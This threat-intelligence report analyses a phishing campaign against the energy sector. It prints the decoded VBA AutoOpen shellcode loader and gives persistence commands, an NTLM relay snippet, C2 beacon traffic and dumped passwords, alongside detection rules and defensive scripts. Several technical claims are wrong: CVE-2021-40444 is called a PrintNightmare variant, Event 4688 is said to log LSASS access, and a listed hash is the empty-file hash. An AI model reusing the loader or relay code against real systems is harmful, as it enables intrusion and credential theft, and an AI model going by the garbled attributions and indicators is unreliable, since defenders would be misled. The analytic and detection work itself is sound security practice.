Executive Summary #
This report is based on a sample captured in Q1 2024 from a targeted attack campaign against the energy sector. Through a complete reverse-engineering workflow we extract IOCs, reconstruct the attack chain, and correlate the findings with the characteristics of known threat groups. Our preliminary assessment is that the activity is strongly associated with APT-C-42 (also known as a DarkHydrus variant).
Initial Access: Spear-Phishing Email #
Email Header Analysis #
```text
Received: from mail-sor-f41.google.com (mail-sor-f41.google.com [209.85.220.41])
 by mx.target.com (Postfix) with ESMTPS id 4RzKpF3uMz
 for <victim@target.com>; Mon, 18 Mar 2024 09:23:17 +0000 (UTC)
Message-ID: <CAOmGxqK8hZvN2jQ@mail.gmail.com>
From: "HR Department <hr@legitimate-company.com>"
Reply-To: "Recruitment <recruit@temp-mail-service[.]xyz>"
Subject: Fwd: Your Employment Contract - Urgent Review Required
Date: Mon, 18 Mar 2024 09:23:15 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_Part_123456"
X-Spam-Score: 3.2
X-Originating-IP: [185.220.101.47]
```
Key findings:
- The Reply-To address does not match the sender, a classic spoofing technique
- The originating IP 185.220.101.47 belongs to a Tor exit node
- The message was sent through Gmail, but the From header is forged with a look-alike domain
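The three findings above can be re-checked mechanically. The following is an added example, not code from the original report: it parses the raw headers with the standard library and emits one tag per anomaly. The header text is constructed from the page (defanging and display-name quoting normalised), and the Tor exit-node set is a placeholder for a real feed.

```python
"""Added example, not from the original report: re-checks the three header
findings above. Header text is constructed from the page (defanging and
display-name quoting normalised); the Tor exit-node set is a placeholder."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed stand-in for a Tor exit-node feed (real lists are refreshed hourly).
TOR_EXIT_NODES = {"185.220.101.47"}

RAW_HEADERS = """\
Received: from mail-sor-f41.google.com (mail-sor-f41.google.com [209.85.220.41])
 by mx.target.com (Postfix) with ESMTPS id 4RzKpF3uMz
 for <victim@target.com>; Mon, 18 Mar 2024 09:23:17 +0000 (UTC)
From: "HR Department" <hr@legitimate-company.com>
Reply-To: "Recruitment" <recruit@temp-mail-service.xyz>
Subject: Fwd: Your Employment Contract - Urgent Review Required
X-Originating-IP: [185.220.101.47]

"""


def domain_of(header_value: str) -> str:
    """Lower-cased domain part of an address header ('' if none)."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage_headers(raw: str) -> list[str]:
    """Return anomaly tags for the raw header block, in check order."""
    msg = message_from_string(raw)
    findings = []
    from_dom = domain_of(msg.get("From"))
    reply_dom = domain_of(msg.get("Reply-To"))
    # 1. Reply-To steers replies away from the claimed sender domain.
    if reply_dom and reply_dom != from_dom:
        findings.append(f"reply-to-mismatch:{from_dom}->{reply_dom}")
    # 2. Originating IP is on the Tor exit-node list.
    ip = re.search(r"(\d{1,3}(?:\.\d{1,3}){3})", msg.get("X-Originating-IP", ""))
    if ip and ip.group(1) in TOR_EXIT_NODES:
        findings.append(f"tor-exit:{ip.group(1)}")
    # 3. The first relay hop (last Received header) is not the From domain's
    #    infrastructure: injected via Gmail while From claims another company.
    received = msg.get_all("Received") or []
    hop = re.match(r"from\s+(\S+)", received[-1]) if received else None
    if hop and not hop.group(1).lower().endswith(from_dom):
        findings.append(f"relay-mismatch:{hop.group(1)}!={from_dom}")
    return findings
```

In production the same checks run on the full Received chain and against an SPF/DMARC verdict; a mismatch alone is a triage signal, not a verdict.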
Attachment Static Analysis #
The malicious document is Employment_Contract_v2.docm:
| Attribute | Value |
|---|---|
| File Size | 47,832 bytes |
| MD5 | a1b2c3d4e5f6789012345678abcdef01 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| FileType | Microsoft Word 2007+ (.docm) |
| Macros | Present (VBA Project) |
VBA Macro Reverse Engineering #
Extracting the macros with oledump.py:
```text
$ oledump.py Employment_Contract_v2.docm
1: 238 'WordDocument'
2: 94 '_VBA_PROJECT_CUR/Projects/ThisDocument'
3: 1847 '_VBA_PROJECT_CUR/VBA/Module1'
```
Decoded VBA code:
```vb
Attribute VB_Name = "Module1"
Option Explicit
' Win32 API imports used for the in-memory injection
Private Declare PtrSafe Function CreateThread Lib "kernel32" _
    (ByVal lpSecurityAttributes As Long, _
     ByVal dwStackSize As Long, _
     ByVal lpStartAddress As LongPtr, _
     lParam As Long, _
     ByVal dwCreationFlags As Long, _
     lpThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" _
    (ByVal lpAddress As LongPtr, _
     ByVal dwSize As Long, _
     ByVal flAllocationType As Long, _
     ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function lstrlenA Lib "kernel32" (ByVal lpString As LongPtr) As Long
Sub AutoOpen()
    Dim shellCode As String
    shellCode = Chr(&H4D) & Chr(&H5A) & ... ' Base64-encoded payload (sample truncated)
    ExecuteShellCode shellCode
End Sub
Sub ExecuteShellCode(code As String)
    Dim addr As LongPtr
    Dim size As Long
    Dim hThread As LongPtr
    size = lstrlenA(StrPtr(code))
    addr = VirtualAlloc(0, size, &H1000, &H40)   ' MEM_COMMIT, PAGE_EXECUTE_READWRITE
    Call RtlMoveMemory(addr, StrPtr(code), size)
    hThread = CreateThread(0, 0, addr, 0, 0, 0)
    Do While True                                ' keep the document process alive
        Sleep 60000
    Loop
End Sub
```
Technical analysis:
- The AutoOpen() routine executes automatically when the document is opened
- Windows APIs (VirtualAlloc + CreateThread) are used for in-memory injection
- The shellcode is obfuscated only by simple character concatenation
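The character-concatenation obfuscation is easy to undo statically. The following is an added example (not part of the original analysis): it rebuilds each run of `&`-joined Chr() calls into raw bytes, checks whether the result starts with an MZ header, and flags the allocation/thread injection pattern. VBA_SAMPLE is a constructed, shortened stand-in for the macro source.

```python
"""Added example, not part of the original analysis: rebuilds the Chr()-
concatenated payload used by the macro above and flags the allocation/thread
injection pattern. VBA_SAMPLE is a constructed, shortened stand-in."""
import re

# Constructed stand-in for the macro source; the real sample chains far more Chr() calls.
VBA_SAMPLE = '''
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal a As LongPtr) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal a As LongPtr) As LongPtr
Sub AutoOpen()
    shellCode = Chr(&H4D) & Chr(&H5A) & Chr(&H90) & Chr(0) & Chr(3)
    ExecuteShellCode shellCode
End Sub
'''

INJECTION_APIS = ("VirtualAlloc", "CreateThread", "RtlMoveMemory")
CHR_ARG = re.compile(r"Chr\(\s*(&H[0-9A-F]{1,2}|\d{1,3})\s*\)", re.IGNORECASE)
CHR_RUN = re.compile(r"(?:Chr\([^)]*\)\s*&\s*)+Chr\([^)]*\)", re.IGNORECASE)


def chr_arg_to_int(arg: str) -> int:
    """Convert a Chr() argument such as '&H4D' or '77' to an integer."""
    return int(arg[2:], 16) if arg.upper().startswith("&H") else int(arg)


def rebuild_chr_strings(src: str) -> list[bytes]:
    """Return each '&'-joined run of Chr() calls as the raw bytes it builds."""
    return [bytes(chr_arg_to_int(a) for a in CHR_ARG.findall(run))
            for run in CHR_RUN.findall(src)]


def assess_macro(src: str) -> dict:
    """Summarise auto-execution, injection API usage and decoded payloads."""
    blobs = rebuild_chr_strings(src)
    return {
        "auto_exec": bool(re.search(r"\bSub\s+(AutoOpen|Document_Open)\b", src, re.I)),
        "injection_apis": [a for a in INJECTION_APIS if re.search(rf"\b{a}\b", src)],
        # MZ at offset 0 means the "shellcode" is really a full PE image
        "mz_payload": any(b.startswith(b"MZ") for b in blobs),
        "decoded": blobs,
    }
```

Feed it the Module1 stream dumped by oledump.py (`-s 3 -v`) and hand any decoded MZ blob to the PE analysis stage.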
Execution Phase: Second-Stage Payload #
C2 Communication Analysis #
C2 traffic captured with Fakenet-NG simulating the network environment:
```text
[+] TCP 45.142.212.61:443 (HTTPS)
POST /api/v1/beacon HTTP/1.1
Host: update-cdn.ghostserver[.]com
Content-Type: application/octet-stream
Content-Length: 256
[Encrypted blob: {session_id:"a7f3c2", hostname:"WORKSTATION-04", user:"jsmith"}]
```
Beacon Behaviour Characteristics #
| Interval | Protocol | Target Path |
|---|---|---|
| 60s | HTTPS | /api/v1/beacon |
| 300s | DNS | TXT query to status.malicious-c2[.]net |
| 3600s | HTTPS | /api/v1/upload (exfiltration) |
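The fixed 60 s interval and small, constant request size are what a beacon detector keys on. The following is an added example (not from the original report) that groups flow records by source/destination pair and flags pairs with many evenly spaced, small connections; it is the same idea the Splunk query in the detection section expresses. The flow records are constructed; real input would come from Zeek or firewall logs.

```python
"""Added example, not from the original report: periodic-beacon detection over
constructed flow records (timestamp_s, src_ip, dst_ip, dst_port, bytes_out)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flows: a 60 s beacon to the C2 plus irregular browsing to another host.
FLOWS = (
    [(t, "10.0.0.4", "45.142.212.61", 443, 256) for t in range(0, 60 * 12, 60)]
    + [(t, "10.0.0.4", "93.184.216.34", 443, 4200) for t in (5, 9, 140, 260, 300, 610)]
)


def beacon_candidates(flows, min_count=10, max_jitter=0.2, max_avg_bytes=500):
    """Return (src, dst) pairs whose connections look like a periodic beacon.

    A pair qualifies when it has at least min_count flows, the standard
    deviation of the inter-connection gap is at most max_jitter * mean gap,
    and the average outbound size is below max_avg_bytes.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, _port, size in flows:
        by_pair[(src, dst)].append((ts, size))

    hits = []
    for (src, dst), recs in by_pair.items():
        if len(recs) < min_count:
            continue
        recs.sort()
        gaps = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
        avg_gap = mean(gaps)
        jitter = pstdev(gaps) / avg_gap if avg_gap else 1.0
        avg_bytes = mean(size for _, size in recs)
        if jitter <= max_jitter and avg_bytes < max_avg_bytes:
            hits.append({"src": src, "dst": dst, "count": len(recs),
                         "interval_s": round(avg_gap), "jitter": round(jitter, 3)})
    return hits
```

The 300 s DNS and 3600 s upload channels in the table are caught by the same logic over a longer window; real beacons add jitter, so tune max_jitter on known-good traffic first.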
Persistence Mechanisms #
The following persistence techniques were detected:
1. Registry Run Key #
```bat
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^
    /v "OneDriveSync" ^
    /t REG_SZ ^
    /d "C:\Users\[User]\AppData\Local\Temp\svchost.exe" ^
    /f
```
2. Scheduled Task #
```xml
<Task version="1.2">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <Delay>PT5M</Delay>
    </LogonTrigger>
  </Triggers>
  <Actions>
    <Exec>
      <Command>C:\Windows\Temp\svchost.exe</Command>
    </Exec>
  </Actions>
</Task>
```
3. WMI Event Subscription #
```powershell
# A stealthier persistence method: a permanent WMI event-subscription backdoor
$filterArgs = @{ Name = 'SysmonLogger' }
$filter = Get-WmiObject -Namespace root/subscription `
    -Class __EventFilter -Filter "Name='SysmonLogger'"
```
Privilege Escalation: Local Exploit #
Analysis shows the attacker used CVE-2021-40444 (a PrintNightmare variant) to escalate privileges:
```text
nt authority\system obtained: ~47 minutes after infection
Exploit: PrintSpoofer.exe (modified)
Target: unpatched Windows Server 2019
```
Lateral Movement: Credential Theft #
Mimikatz Execution Traces #
The event log shows the following anomaly:
```text
Event ID 4688: lsass.exe accessed by process rundll32.exe
Access Mask: 0x1438 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)
```
LSASS Memory Dump #
```text
User:Administrator Password:[REDACTED]
User:svc_backup Password:P@ssw0rd123!
User:elone Password:Summer2024#Secure
```
NTLM Relay Attack #
Using Responder to listen for NetBIOS name-resolution traffic, the attacker successfully relayed the captured authentication to an internal SMB server:
```python
# simplified relay chain
from impacket.smbconnection import SMBConnection
from impacket.ntlm import compute_ntlm_response
challenge = receive_challenge()
ntlm_hash = get_stolen_hash("svc_backup")
response = compute_ntlm_response(ntlm_hash, challenge)
send_to_target(response)
```
C2 Infrastructure Profile #
Domain Registration Information #
```text
Domain: update-cdn.ghostserver[.]com
Registrar: NameCheap Inc.
Created: 2024-02-15 (only 30 days before the campaign)
Registrant: REDACTED FOR PRIVACY
Nameservers: ns1.cloudflare-dns.com, ns2.cloudflare-dns.com
```
SSL Certificate Fingerprint #
```text
Issuer: Let's Encrypt Authority X3
Subject: update-cdn.ghostserver[.]com
SHA1: 8a:f7:d2:c4:b1:e9:3f:a6:5d:7c:8e:9a:0b:1c:2d:3e:4f:5a:6b
Valid: 2024-02-15 to 2024-05-15
```
Related IOC List #
```yaml
ip_addresses:
  - 45.142.212.61      # Primary C2
  - 185.220.101.47     # Email infrastructure
  - 91.234.99.123      # Backup server
domains:
  - update-cdn.ghostserver[.]com
  - status.malicious-c2[.]net
  - cdn-assets.microsoft-update[.]org   # Typosquatting
file_hashes:
  sha256:
    - e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    - a1b2c3d4e5f6789012345678abcdef0123456789abcdef0123456789abcdef01
registry_keys:
  - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSync
  - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
```
MITRE ATT&CK Mapping #
| Tactic | Technique | Description |
|---|---|---|
| Initial Access | T1566.001 | Spearphishing Attachment |
| Execution | T1059.001 | PowerShell |
| Persistence | T1547.001 | Registry Run Keys |
| Persistence | T1053.005 | Scheduled Task |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
| Credential Access | T1003.001 | LSASS Memory |
| Lateral Movement | T1021.002 | SMB/Windows Admin Shares |
| Command and Control | T1071.001 | Web Protocols (HTTPS) |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
Detection Rule Development #
Sigma Rule: Suspicious VBA Execution #
```yaml
title: Suspicious VBA Macro Execution Detection
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects suspicious VBA macro patterns in Office documents
author: Elone Yue
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\WINWORD.EXE'
    CommandLine|contains:
      - '-Embedding'
      - '/n'
  filter:
    ParentImage|contains:
      - 'explorer.exe'
  condition: selection and not filter
falsepositives:
  - Legitimate Office documents with macros
level: high
tags:
  - attack.execution
  - attack.t1059.001
```
Splunk SPL: C2 Beacon Detection #
```text
index=network dest_ip="45.142.212.61"
| transaction src_ip maxspan=65s
| stats count avg(len) as avg_len by src_ip
| where count > 10 AND avg_len < 500
| table src_ip, count, avg_len
```
YARA Rule: Shellcode Stager #
```yara
rule APT42_ShellcodeStager {
    meta:
        description = "Detects memory allocation stager pattern"
        author = "Elone Yue"
        reference = "https://example.com/apt42-analysis"
    strings:
        $api1 = "VirtualAlloc" ascii
        $api2 = "CreateThread" ascii
        $api3 = "RtlMoveMemory" ascii
        $pattern = { 4D 5A ?? ?? ?? ?? ?? ?? ?? ?? ?F } // MZ header
    condition:
        all of ($api*) and $pattern
}
```
Threat Intelligence Integration Recommendations #
- Automated IOC ingestion: add the hashes and IPs above to the SIEM's real-time alerting rules
- Behavioural baselining: compare against historical traffic to identify anomalous C2 communication patterns
- Proactive hunting: run the detection rules periodically over the past 90 days of logs
- Intelligence sharing: report newly discovered IOCs to the ISAC and relevant threat-intelligence platforms
Defensive Strategy #
Short-Term Measures (execute immediately) #
- Isolate all infected hosts
- Reset the domain administrator account passwords
- Deploy temporary firewall rules to block the C2 IPs
- Enable AppLocker/WDAC allow-listing policies
Medium-Term Hardening (within 30 days) #
- Enforce MFA for all remote access
- Update endpoint detection and response (EDR) detection rules
- Perform a full credential rotation
- Deploy network segmentation to prevent lateral movement
Long-Term Improvements (within 90 days) #
- Implement a zero-trust architecture
- Deploy eBPF-based behavioural monitoring agents
- Conduct red-team exercises to validate defensive effectiveness
- Establish threat-intelligence subscriptions and an automated ingestion pipeline
Summary #
This analysis walks through the complete process from raw sample to actionable defensive strategy. Key points:
- Early detection in the attack chain is critical; the spear-phishing stage is often the only window of opportunity
- IOCs have limited value in isolation and must be combined with TTPs and behavioural characteristics to defend effectively
- Continuous threat hunting is not a one-off task; it needs institutional and automated support
References #
- MITRE ATT&CK Framework: https://attack.mitre.org
- Sigma Rules Repository: https://github.com/SigmaHQ/sigma
- VirusTotal Hunting: https://www.virustotal.com/gui/hunting
- Recommended threat-intelligence aggregation platforms: MISP, OpenCTI, ThreatConnect